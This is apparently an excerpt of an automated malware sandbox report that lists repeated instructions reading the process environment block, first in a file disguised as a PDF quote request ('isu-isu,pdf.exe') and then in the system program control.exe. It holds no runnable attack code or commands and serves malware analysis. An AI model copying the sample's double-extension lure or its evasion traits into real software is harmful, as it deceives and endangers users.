Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009C9100 mov eax, dword ptr fs:[00000030h] 2_2_009C9100
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009C9100 mov eax, dword ptr fs:[00000030h] 2_2_009C9100
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009F513A mov eax, dword ptr fs:[00000030h] 2_2_009F513A
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009F513A mov eax, dword ptr fs:[00000030h] 2_2_009F513A
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009E4120 mov eax, dword ptr fs:[00000030h] 2_2_009E4120
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009E4120 mov eax, dword ptr fs:[00000030h] 2_2_009E4120
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009E4120 mov eax, dword ptr fs:[00000030h] 2_2_009E4120
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009E4120 mov eax, dword ptr fs:[00000030h] 2_2_009E4120
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009E4120 mov ecx, dword ptr fs:[00000030h] 2_2_009E4120
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009EB944 mov eax, dword ptr fs:[00000030h] 2_2_009EB944
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009EB944 mov eax, dword ptr fs:[00000030h] 2_2_009EB944
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009CB171 mov eax, dword ptr fs:[00000030h] 2_2_009CB171
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009CB171 mov eax, dword ptr fs:[00000030h] 2_2_009CB171
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009CC962 mov eax, dword ptr fs:[00000030h] 2_2_009CC962
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009FD294 mov eax, dword ptr fs:[00000030h] 2_2_009FD294
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009FD294 mov eax, dword ptr fs:[00000030h] 2_2_009FD294
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009DAAB0 mov eax, dword ptr fs:[00000030h] 2_2_009DAAB0
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009DAAB0 mov eax, dword ptr fs:[00000030h] 2_2_009DAAB0
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009FFAB0 mov eax, dword ptr fs:[00000030h] 2_2_009FFAB0
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009C52A5 mov eax, dword ptr fs:[00000030h] 2_2_009C52A5
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009C52A5 mov eax, dword ptr fs:[00000030h] 2_2_009C52A5
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009C52A5 mov eax, dword ptr fs:[00000030h] 2_2_009C52A5
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009C52A5 mov eax, dword ptr fs:[00000030h] 2_2_009C52A5
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009C52A5 mov eax, dword ptr fs:[00000030h] 2_2_009C52A5
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009F2ACB mov eax, dword ptr fs:[00000030h] 2_2_009F2ACB
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009F2AE4 mov eax, dword ptr fs:[00000030h] 2_2_009F2AE4
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009E3A1C mov eax, dword ptr fs:[00000030h] 2_2_009E3A1C
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009CAA16 mov eax, dword ptr fs:[00000030h] 2_2_009CAA16
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009CAA16 mov eax, dword ptr fs:[00000030h] 2_2_009CAA16
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A04A2C mov eax, dword ptr fs:[00000030h] 2_2_00A04A2C
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A04A2C mov eax, dword ptr fs:[00000030h] 2_2_00A04A2C
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009C5210 mov eax, dword ptr fs:[00000030h] 2_2_009C5210
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009C5210 mov ecx, dword ptr fs:[00000030h] 2_2_009C5210
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009C5210 mov eax, dword ptr fs:[00000030h] 2_2_009C5210
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009C5210 mov eax, dword ptr fs:[00000030h] 2_2_009C5210
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009D8A0A mov eax, dword ptr fs:[00000030h] 2_2_009D8A0A
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A8AA16 mov eax, dword ptr fs:[00000030h] 2_2_00A8AA16
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A8AA16 mov eax, dword ptr fs:[00000030h] 2_2_00A8AA16
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A7B260 mov eax, dword ptr fs:[00000030h] 2_2_00A7B260
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A7B260 mov eax, dword ptr fs:[00000030h] 2_2_00A7B260
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A98A62 mov eax, dword ptr fs:[00000030h] 2_2_00A98A62
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A0927A mov eax, dword ptr fs:[00000030h] 2_2_00A0927A
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009C9240 mov eax, dword ptr fs:[00000030h] 2_2_009C9240
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009C9240 mov eax, dword ptr fs:[00000030h] 2_2_009C9240
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009C9240 mov eax, dword ptr fs:[00000030h] 2_2_009C9240
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009C9240 mov eax, dword ptr fs:[00000030h] 2_2_009C9240
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A54257 mov eax, dword ptr fs:[00000030h] 2_2_00A54257
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A8EA55 mov eax, dword ptr fs:[00000030h] 2_2_00A8EA55
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009F2397 mov eax, dword ptr fs:[00000030h] 2_2_009F2397
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A95BA5 mov eax, dword ptr fs:[00000030h] 2_2_00A95BA5
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009FB390 mov eax, dword ptr fs:[00000030h] 2_2_009FB390
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009D1B8F mov eax, dword ptr fs:[00000030h] 2_2_009D1B8F
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009D1B8F mov eax, dword ptr fs:[00000030h] 2_2_009D1B8F
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A8138A mov eax, dword ptr fs:[00000030h] 2_2_00A8138A
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A7D380 mov ecx, dword ptr fs:[00000030h] 2_2_00A7D380
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009F4BAD mov eax, dword ptr fs:[00000030h] 2_2_009F4BAD
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009F4BAD mov eax, dword ptr fs:[00000030h] 2_2_009F4BAD
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009F4BAD mov eax, dword ptr fs:[00000030h] 2_2_009F4BAD
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A453CA mov eax, dword ptr fs:[00000030h] 2_2_00A453CA
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A453CA mov eax, dword ptr fs:[00000030h] 2_2_00A453CA
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009EDBE9 mov eax, dword ptr fs:[00000030h] 2_2_009EDBE9
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009F03E2 mov eax, dword ptr fs:[00000030h] 2_2_009F03E2
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009F03E2 mov eax, dword ptr fs:[00000030h] 2_2_009F03E2
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009F03E2 mov eax, dword ptr fs:[00000030h] 2_2_009F03E2
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009F03E2 mov eax, dword ptr fs:[00000030h] 2_2_009F03E2
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009F03E2 mov eax, dword ptr fs:[00000030h] 2_2_009F03E2
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009F03E2 mov eax, dword ptr fs:[00000030h] 2_2_009F03E2
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A8131B mov eax, dword ptr fs:[00000030h] 2_2_00A8131B
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009CF358 mov eax, dword ptr fs:[00000030h] 2_2_009CF358
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009CDB40 mov eax, dword ptr fs:[00000030h] 2_2_009CDB40
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009F3B7A mov eax, dword ptr fs:[00000030h] 2_2_009F3B7A
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009F3B7A mov eax, dword ptr fs:[00000030h] 2_2_009F3B7A
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A98B58 mov eax, dword ptr fs:[00000030h] 2_2_00A98B58
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009CDB60 mov ecx, dword ptr fs:[00000030h] 2_2_009CDB60
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009D849B mov eax, dword ptr fs:[00000030h] 2_2_009D849B
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A814FB mov eax, dword ptr fs:[00000030h] 2_2_00A814FB
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A46CF0 mov eax, dword ptr fs:[00000030h] 2_2_00A46CF0
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A98CD6 mov eax, dword ptr fs:[00000030h] 2_2_00A98CD6
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A9740D mov eax, dword ptr fs:[00000030h] 2_2_00A9740D
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A81C06 mov eax, dword ptr fs:[00000030h] 2_2_00A81C06
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A46C0A mov eax, dword ptr fs:[00000030h] 2_2_00A46C0A
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009FBC2C mov eax, dword ptr fs:[00000030h] 2_2_009FBC2C
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009FA44B mov eax, dword ptr fs:[00000030h] 2_2_009FA44B
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009E746D mov eax, dword ptr fs:[00000030h] 2_2_009E746D
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A5C450 mov eax, dword ptr fs:[00000030h] 2_2_00A5C450
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009FFD9B mov eax, dword ptr fs:[00000030h] 2_2_009FFD9B
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A905AC mov eax, dword ptr fs:[00000030h] 2_2_00A905AC
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009C2D8A mov eax, dword ptr fs:[00000030h] 2_2_009C2D8A
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009F2581 mov eax, dword ptr fs:[00000030h] 2_2_009F2581
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009F1DB5 mov eax, dword ptr fs:[00000030h] 2_2_009F1DB5
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009F35A1 mov eax, dword ptr fs:[00000030h] 2_2_009F35A1
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A8FDE2 mov eax, dword ptr fs:[00000030h] 2_2_00A8FDE2
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A78DF1 mov eax, dword ptr fs:[00000030h] 2_2_00A78DF1
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A46DC9 mov eax, dword ptr fs:[00000030h] 2_2_00A46DC9
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A46DC9 mov ecx, dword ptr fs:[00000030h] 2_2_00A46DC9
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009DD5E0 mov eax, dword ptr fs:[00000030h] 2_2_009DD5E0
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A8E539 mov eax, dword ptr fs:[00000030h] 2_2_00A8E539
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A4A537 mov eax, dword ptr fs:[00000030h] 2_2_00A4A537
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A98D34 mov eax, dword ptr fs:[00000030h] 2_2_00A98D34
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009F4D3B mov eax, dword ptr fs:[00000030h] 2_2_009F4D3B
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009D3D34 mov eax, dword ptr fs:[00000030h] 2_2_009D3D34
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009CAD30 mov eax, dword ptr fs:[00000030h] 2_2_009CAD30
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009E7D50 mov eax, dword ptr fs:[00000030h] 2_2_009E7D50
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A03D43 mov eax, dword ptr fs:[00000030h] 2_2_00A03D43
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A43540 mov eax, dword ptr fs:[00000030h] 2_2_00A43540
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A73D40 mov eax, dword ptr fs:[00000030h] 2_2_00A73D40
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009EC577 mov eax, dword ptr fs:[00000030h] 2_2_009EC577
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A446A7 mov eax, dword ptr fs:[00000030h] 2_2_00A446A7
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A90EA5 mov eax, dword ptr fs:[00000030h] 2_2_00A90EA5
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A5FE87 mov eax, dword ptr fs:[00000030h] 2_2_00A5FE87
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009F36CC mov eax, dword ptr fs:[00000030h] 2_2_009F36CC
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A7FEC0 mov eax, dword ptr fs:[00000030h] 2_2_00A7FEC0
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A08EC7 mov eax, dword ptr fs:[00000030h] 2_2_00A08EC7
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009F16E0 mov ecx, dword ptr fs:[00000030h] 2_2_009F16E0
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A98ED6 mov eax, dword ptr fs:[00000030h] 2_2_00A98ED6
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009D76E2 mov eax, dword ptr fs:[00000030h] 2_2_009D76E2
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009FA61C mov eax, dword ptr fs:[00000030h] 2_2_009FA61C
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A7FE3F mov eax, dword ptr fs:[00000030h] 2_2_00A7FE3F
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009CC600 mov eax, dword ptr fs:[00000030h] 2_2_009CC600
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009F8E00 mov eax, dword ptr fs:[00000030h] 2_2_009F8E00
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A81608 mov eax, dword ptr fs:[00000030h] 2_2_00A81608
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009CE620 mov eax, dword ptr fs:[00000030h] 2_2_009CE620
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009D7E41 mov eax, dword ptr fs:[00000030h] 2_2_009D7E41
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A8AE44 mov eax, dword ptr fs:[00000030h] 2_2_00A8AE44
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009EAE73 mov eax, dword ptr fs:[00000030h] 2_2_009EAE73
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009D766D mov eax, dword ptr fs:[00000030h] 2_2_009D766D
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009D8794 mov eax, dword ptr fs:[00000030h] 2_2_009D8794
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A47794 mov eax, dword ptr fs:[00000030h] 2_2_00A47794
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A037F5 mov eax, dword ptr fs:[00000030h] 2_2_00A037F5
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009EF716 mov eax, dword ptr fs:[00000030h] 2_2_009EF716
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009FA70E mov eax, dword ptr fs:[00000030h] 2_2_009FA70E
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A9070D mov eax, dword ptr fs:[00000030h] 2_2_00A9070D
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009FE730 mov eax, dword ptr fs:[00000030h] 2_2_009FE730
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009C4F2E mov eax, dword ptr fs:[00000030h] 2_2_009C4F2E
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A5FF10 mov eax, dword ptr fs:[00000030h] 2_2_00A5FF10
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A98F6A mov eax, dword ptr fs:[00000030h] 2_2_00A98F6A
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009DEF40 mov eax, dword ptr fs:[00000030h] 2_2_009DEF40
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009DFF60 mov eax, dword ptr fs:[00000030h] 2_2_009DFF60
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047B746D mov eax, dword ptr fs:[00000030h] 7_2_047B746D
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047CA44B mov eax, dword ptr fs:[00000030h] 7_2_047CA44B
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04868CD6 mov eax, dword ptr fs:[00000030h] 7_2_04868CD6
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047CBC2C mov eax, dword ptr fs:[00000030h] 7_2_047CBC2C
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04816CF0 mov eax, dword ptr fs:[00000030h] 7_2_04816CF0
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_048514FB mov eax, dword ptr fs:[00000030h] 7_2_048514FB
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04851C06 mov eax, dword ptr fs:[00000030h] 7_2_04851C06
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0486740D mov eax, dword ptr fs:[00000030h] 7_2_0486740D
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04816C0A mov eax, dword ptr fs:[00000030h] 7_2_04816C0A
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0482C450 mov eax, dword ptr fs:[00000030h] 7_2_0482C450
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047A849B mov eax, dword ptr fs:[00000030h] 7_2_047A849B
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047BC577 mov eax, dword ptr fs:[00000030h] 7_2_047BC577
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_048605AC mov eax, dword ptr fs:[00000030h] 7_2_048605AC
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047B7D50 mov eax, dword ptr fs:[00000030h] 7_2_047B7D50
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047D3D43 mov eax, dword ptr fs:[00000030h] 7_2_047D3D43
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047C4D3B mov eax, dword ptr fs:[00000030h] 7_2_047C4D3B
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04816DC9 mov eax, dword ptr fs:[00000030h] 7_2_04816DC9
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04816DC9 mov ecx, dword ptr fs:[00000030h] 7_2_04816DC9
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0479AD30 mov eax, dword ptr fs:[00000030h] 7_2_0479AD30
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047A3D34 mov eax, dword ptr fs:[00000030h] 7_2_047A3D34
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0485FDE2 mov eax, dword ptr fs:[00000030h] 7_2_0485FDE2
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04848DF1 mov eax, dword ptr fs:[00000030h] 7_2_04848DF1
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047AD5E0 mov eax, dword ptr fs:[00000030h] 7_2_047AD5E0
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04868D34 mov eax, dword ptr fs:[00000030h] 7_2_04868D34
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0481A537 mov eax, dword ptr fs:[00000030h] 7_2_0481A537
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0485E539 mov eax, dword ptr fs:[00000030h] 7_2_0485E539
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04813540 mov eax, dword ptr fs:[00000030h] 7_2_04813540
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047C1DB5 mov eax, dword ptr fs:[00000030h] 7_2_047C1DB5
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047C35A1 mov eax, dword ptr fs:[00000030h] 7_2_047C35A1
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047CFD9B mov eax, dword ptr fs:[00000030h] 7_2_047CFD9B
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04792D8A mov eax, dword ptr fs:[00000030h] 7_2_04792D8A
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047C2581 mov eax, dword ptr fs:[00000030h] 7_2_047C2581
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0482FE87 mov eax, dword ptr fs:[00000030h] 7_2_0482FE87
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047BAE73 mov eax, dword ptr fs:[00000030h] 7_2_047BAE73
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047A766D mov eax, dword ptr fs:[00000030h] 7_2_047A766D
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04860EA5 mov eax, dword ptr fs:[00000030h] 7_2_04860EA5
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_048146A7 mov eax, dword ptr fs:[00000030h] 7_2_048146A7
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047A7E41 mov eax, dword ptr fs:[00000030h] 7_2_047A7E41
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0484FEC0 mov eax, dword ptr fs:[00000030h] 7_2_0484FEC0
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04868ED6 mov eax, dword ptr fs:[00000030h] 7_2_04868ED6
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0479E620 mov eax, dword ptr fs:[00000030h] 7_2_0479E620
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047CA61C mov eax, dword ptr fs:[00000030h] 7_2_047CA61C
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047CA61C mov eax, dword ptr fs:[00000030h] 7_2_047CA61C
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0479C600 mov eax, dword ptr fs:[00000030h] 7_2_0479C600
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0479C600 mov eax, dword ptr fs:[00000030h] 7_2_0479C600
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0479C600 mov eax, dword ptr fs:[00000030h] 7_2_0479C600
